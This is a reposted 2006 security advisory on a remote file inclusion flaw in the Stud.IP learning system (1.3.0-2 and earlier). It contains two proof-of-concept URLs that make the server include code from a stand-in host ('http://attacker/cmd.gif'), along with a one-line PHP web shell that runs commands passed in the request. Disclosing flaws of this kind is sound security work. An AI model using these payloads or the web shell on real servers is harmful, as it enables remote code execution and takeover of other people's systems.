Lucene search

K

StudIP1302.txt

🗓️ 02 Jul 2006 00:00:00Reported by Hamid EbadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Stud.IP Remote File Inclusion vulnerability in version 1.3.0-2 and below allows arbitrary PHP code execution

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`/*------------------------------------------------  
IHS Public advisory  
-------------------------------------------------*/  
  
Stud.IP Remote File Inclusion  
Stud.IP is a learning and an information management  
system for universities, educational facilities and  
enterprises.  
  
http://www.studip.de  
http://www.data-quest.de  
http://www.sourceforge.net/projects/studip  
  
  
Discovered by Hamid Ebadi Credit :  
all go to IHS team (IHS : IRAN HOMELAND SECURITY)  
www.ihsteam.com (persian)  
www.ihsteam.net (english)  
  
  
The original article can be found at:  
http://www.hamid.ir/security/  
http://www.IHSteam.com  
  
Vulnerable Systems:  
studip 1.3.0-2 and below  
  
  
Input passed to the "_PHPLIB[libdir]" parameter in  
studip-phplib/oohforms.inc and to the  
"ABSOLUTE_PATH_STUDIP" parameter in  
studip-htdocs/archiv_assi.php is not properly verified  
before being used to include files.  
This can be exploited to execute arbitrary PHP code by  
including files from local or external resources.  
  
POC Exploits:  
  
The following URL will cause the server to include  
external files  
http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif?  
http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif?  
  
cmd.gif  
<?  
passthru($_GET['cmd']);  
?>  
  
Solution:  
Edit the source code to ensure that input is properly verified.  
  
  
greeting :  
LorD , NT , C0d3r of IHS  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo